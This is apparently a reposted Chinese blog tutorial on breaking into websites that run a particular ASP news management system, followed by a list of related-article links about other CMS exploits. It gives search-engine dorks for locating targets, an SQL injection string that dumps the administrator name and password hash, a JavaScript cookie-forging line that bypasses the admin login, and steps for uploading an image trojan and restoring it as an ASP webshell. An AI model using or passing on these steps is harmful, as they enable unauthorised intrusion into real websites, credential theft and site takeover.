首先声明这方法不是我原创,我是从网上学习来的,由自己的语言重新编译一下的。

在谷歌搜索 inurl: admin/admin_news_pl_view.asp    打开搜索到的网址或者输入 inurl:news_more.asp?lm2=

然后修改成 admin/admin_news_pl_view.asp?id=1 或者 admin/admin_news_pl_view.asp?id=2 或者 admin/admin_news_pl_view.asp?id=3

只要显示错误就一直打3,4,5......
    找到管理员和32位MDB密码后破解MDB密码,然后进后台  admin/admin_index.asp 输入破解好的用户名和密码直接进系统

另外还可以这样子进后台:

|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='             // 得到管理员用户和MD5密码
cookies进后台
javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));

在系统里面有上传图片的功能,上传后,再用备份恢复数据库的功能来恢复上传好的JPG木马成 ASP格式,搞定。

转载于:https://www.cnblogs.com/swane/articles/3540137.html

讯时网站管理系统通杀0DAY漏洞相关推荐

  1. iis+php解析漏洞修复,IIS7.0畸形解析漏洞通杀0day

    IIS7.0畸形解析0day通杀漏洞,和Nginx上次的0day一样.使用iis7.0的注意了.临时解决办法:关闭cgi.fix_pathinfo为0 Nginx好像又爆0day了,windows下可 ...

  2. V5shop 8.2版本下通杀注入漏洞

    漏洞危害:高危 一.漏洞文件:cart.aspx 搜索关键词:inurl:scoreindex.aspx exp : /cart.aspx?act=buy&id=1 and (Select T ...

  3. mysql5.5.57 漏洞_DEDECMS(织梦程序)5.5-5.7通杀GetShell漏洞

    入侵步骤如下:http://www.oday.pw/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=i ...

  4. 某彩虹资源共享通杀漏洞

    任意文件读取是属于文件操作漏洞的一种. 一般任意文件读取漏洞可以读取配置的信息甚至系统文件更重要. 是的你没看错,通杀0day 在某天上课的时候闲着,音乐老师放着好运来,好机会啊,赶紧挖个洞看看,接着 ...

  5. recommend.php sql注入漏洞,Espcms通杀SQL注入漏洞分析(附EXP)

    漏洞:Espcms 通杀 SQL注入漏洞分析附EXP 漏洞作者:Seay博客:www.cnseay.com 官网介绍: 易思ESPCMS企业网站管理系统基于LAMP开发构建的企业网站管理系统,它具有操 ...

  6. Espcms通杀SQL注入漏洞分析(附EXP)

    漏洞:Espcms 通杀 SQL注入漏洞分析附EXP 漏洞作者:Seay 博客:www.cnseay.com 官网介绍: 易思ESPCMS企业网站管理系统基于LAMP开发构建的企业网站管理系统,它具有 ...

  7. e7xue.php漏洞_简要分析最近的dedecms通杀漏洞以及漏洞补丁的绕过

    话说文章写得菜不要紧,首先标题要跟大牛一样! 作者:单恋一支花 出自:t00ls 转载请注明出处,如有雷同,纯属别人抄袭,嘿嘿! 一:写在前面 今天晚上想老婆了,失眠了,蛋裂之余,进吐司寻找基友,惊现 ...

  8. 漏洞进阶之——XSS万能超级无敌全通杀payload

    XSS万能超级无敌全通杀payload XSS 漏洞简介 payload--on,js事件 payload--标签 payload--过狗过墙思路 本人常用payload分享 ------------ ...

  9. 易想团购 注入 user.php,易想团购系统通杀SQL注入漏洞分析及利用漏洞预警 -电脑资料...

    刚打开红黑看到J8基友写的一个{易想团购系统 最新版 通杀}的文章,看他贴的代码里面有个get_client_ip()函数,哈哈,我猜没过滤,果断下了一套程序, 找到get_client_ip()函数 ...

最新文章

  1. 【案例】弱电机房用电负荷计算意义及计算方法
  2. java序列化如何实现_Java实现序列化与反序列化的简单示例
  3. 《openssl 编程》之错误处理
  4. BZOJ 4516: [Sdoi2016]生成魔咒 [后缀自动机]
  5. linux 4412跑程序,荣品4412的板子上跑纯linux
  6. 15 岁黑进系统,发挑衅邮件意外获 Offer,不惑之年捐出全部财产,Twitter CEO 太牛了!...
  7. gmp新附录 计算机系统,GMP新附录:计算机系统.doc
  8. EcShop二次开发学习方法和Ecshop二次开发必备基础
  9. Linux iptable文档
  10. TimeLine学习笔记
  11. IDEA项目can not reconnect错误
  12. RSA中 底数m和模数 n 不互素是仍然成立
  13. 如何添加Google统计在自己的网站
  14. boss直聘改回系统头像_Boss直聘VS猎聘,谁的营销广告更胜一筹
  15. 送你一个励志故事——涵盖20多所互联网公司的校招C++面经
  16. HDU 6595 Everything Is Generated In Equal Probability (期望dp,线性推导)
  17. 《Asp.Net MVC 》复习题目
  18. 事件参数$event
  19. 使用java自造TCP/IP协议栈:使用JPCAP实现数据发包
  20. Linux网络安全策略

热门文章

  1. PHPExcel 锁定表头 设置样式,背景颜色,居中,宽,单元格合并
  2. java.io.IOException: Attempted read from closed stream.
  3. 千万级大V独家合作,西瓜视频用什么吸引创作人?
  4. python定义一个dog类 类属性有名字毛色体重_全面了解python中的类,对象,方法,属性...
  5. 《数学之美》读后感与商榷
  6. 教你如何做个妖精(女人必读)
  7. FLASH,宣传画册,翻书效果
  8. 善于计划,善于总结,善于归纳
  9. 【JAVA】图形用户界面练习
  10. 【lc3】汇编实现I/O中断